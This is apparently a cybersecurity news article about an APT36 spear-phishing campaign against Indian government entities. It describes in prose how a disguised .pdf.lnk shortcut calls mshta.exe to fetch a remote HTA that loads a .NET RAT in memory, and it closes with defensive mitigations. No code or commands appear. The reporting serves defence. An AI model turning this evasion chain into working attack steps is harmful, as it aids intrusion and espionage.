editorially independent. We may make money when you click on links
to our partners.
Learn More
A suspected nation-state group launched a cyber-espionage campaign targeting Indian government entities using malicious Windows shortcut files.
The campaign uses “… deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” said Cyfirma researchers.
APT36 Behind the LNK Espionage Campaign
The campaign is attributed to APT36, also known as Transparent Tribe, a threat actor with a long history of targeting government, defense, and research organizations in South Asia.
The attack begins with spear-phishing emails delivering a ZIP archive titled Online JLPT Exam Dec 2025.zip, an exam-themed lure intended to trick officials into opening the attachment.
Once extracted, the archive presents a file named Online JLPT Exam Dec 2025.pdf, which appears to be a standard document but is actually a malicious shortcut using a double extension (.pdf.lnk).
Because Windows hides the .lnk extension by default, even users who enable file extensions may see what looks like a harmless PDF.
From LNK to RAT: Breaking Down the Attack
The shortcut file is unusually large — over 2 MB — closer in size to a real PDF than a typical LNK.
Cyfirma researchers found that the file embeds a full PDF structure and multiple images to reinforce its legitimacy.
When opened, however, Windows executes the shortcut’s target command instead of opening a document.
Rather than launching a PDF reader, the shortcut invokes mshta.exe, a trusted Windows utility, and passes it a remote HTML Application (HTA) file hosted on attacker-controlled infrastructure.
The command silently retrieves and executes the script in a hidden window, making the infection invisible to the victim.
The HTA script uses custom Base64 decoding and XOR decryption routines to reconstruct two payload components in memory.
One component weakens .NET security checks and prepares the runtime environment, while the second loads an encrypted .NET-based remote access trojan (RAT) directly into memory.
No malicious files are written to disk, reducing the likelihood of detection by traditional antivirus tools.
To further evade suspicion, the malware downloads and opens a legitimate JLPT exam PDF once execution is complete.
From the victim’s perspective, the document appears to open normally, masking the fact that the system has already been compromised.
The researchers noted that the malware communicates with its command-and-control (C2) server over encrypted channels and relies heavily on trusted Windows processes, making detection and attribution more challenging.
The espionage campaign abusing Windows shortcut files highlights how attackers continue to leverage trusted file types and built-in system tools to bypass traditional defenses.
Because these attacks often rely on living-off-the-land techniques and fileless execution, they can evade signature-based detection and persist in enterprise environments.
The following measures outline practical steps organizations can take to reduce exposure, improve detection, and limit the impact of shortcut-based malware attacks.
- Treat Windows shortcut (.lnk) files as high-risk attachments by blocking or restricting their execution when delivered via email or untrusted sources.
- Restrict or disable mshta.exe and HTA execution using Group Policy, AppLocker, or WDAC to prevent abuse of built-in Windows tools.
- Strengthen email security controls to detect double extensions, oversized shortcuts, and malicious ZIP archives before delivery.
- Deploy EDR and memory-based protections to detect in-memory malware, living-off-the-land techniques, and suspicious .NET runtime behavior.
- Limit attacker command-and-control opportunities by monitoring and restricting outbound network traffic, especially to newly registered or uncommon domains.
- Reduce overall risk through security awareness training, least-privilege endpoint access, and incident response plans tailored for fileless attacks.
Combined, these controls help limit attacker movement and contain the blast radius of shortcut-based attacks.
Attackers Hide in Plain Sight
This campaign reflects a broader trend in modern threat actor operations, where attackers deliberately abuse trusted file formats and native system tools to blend malicious activity into normal user behavior.
By leveraging commonly accepted files and built-in Windows utilities, threat actors can bypass traditional security controls and evade detection.
As attackers increasingly exploit implicit trust in familiar tools and file types, many organizations are turning to zero-trust approaches to continuously verify activity and limit abuse.
